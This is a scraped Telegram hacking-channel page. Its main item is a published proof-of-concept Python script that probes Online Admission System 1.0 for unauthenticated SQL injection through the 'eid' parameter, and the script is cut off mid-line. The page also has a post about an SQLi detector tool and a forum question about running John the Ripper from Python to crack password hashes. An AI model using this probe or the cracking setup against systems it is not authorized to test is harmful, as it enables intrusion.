Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Online Admission System 1.0 SQL Injection

https://4.bp.blogspot.com/-our8kmhncnY/WWlvTk7Dk6I/AAAAAAAAINs/ofoeVvTLCzkScTt1I86TmBZptlym-DdFACLcBGAs/s1600/h42.png
Online Admission System version 1.0 suffers from a remote SQL injection vulnerability.

SHA-256 | 9f6552806e7f79bf6438a86513e24999dcff366eebb104a253377d13284fc82e

Download
# Exploit Title: online-admission-system 1.0 - unauthenticated SQL Injection
# Date: 5-08-2022
# Exploit Author: syad
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/15514/online-admission-system-php-and-mysql.html
# Version: 1.0
# Tested on: Windows 10 + XAMPP 3.2.4
# CVE ID : N/A

# Description
# The eid parameter does not perform input validation on the edit.php file it allow unauthenticated SQL Injection
import requests
import sys

proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"}

def send_request(ip):
x = "http://%s/Student-Admission_0/Student-Admission/?a=edit&eid=8'" %ip
z = requests.get(x,proxies=proxies)
if "You have an error in your SQL syntax" in z.text:
print("[+] Found Sql Injection")
if __name__ == "__main__":
try:
ip = sys.argv[1].strip()

except IndexError:
print("[-] Usage %s
Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Automate SQLiDetector Hacking Tool

completely automate SQLI-Injection detector hacking toolContinue reading on Medium »
Read more...
hacking: security in practice
John the Ripper not working with subprocess

I am trying to use jtr to crack some passwords and I am running it through the subprocess command in python. It says that it cracked the password but when I try to look in the .pot file it says that no hashes were cracked.
password = subprocess.run(['/home/*user*/john-1.9.0-jumbo-1/run/john', mask, '/home/*user*/hashed_password.txt'])
submitted by /u/Musskky
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video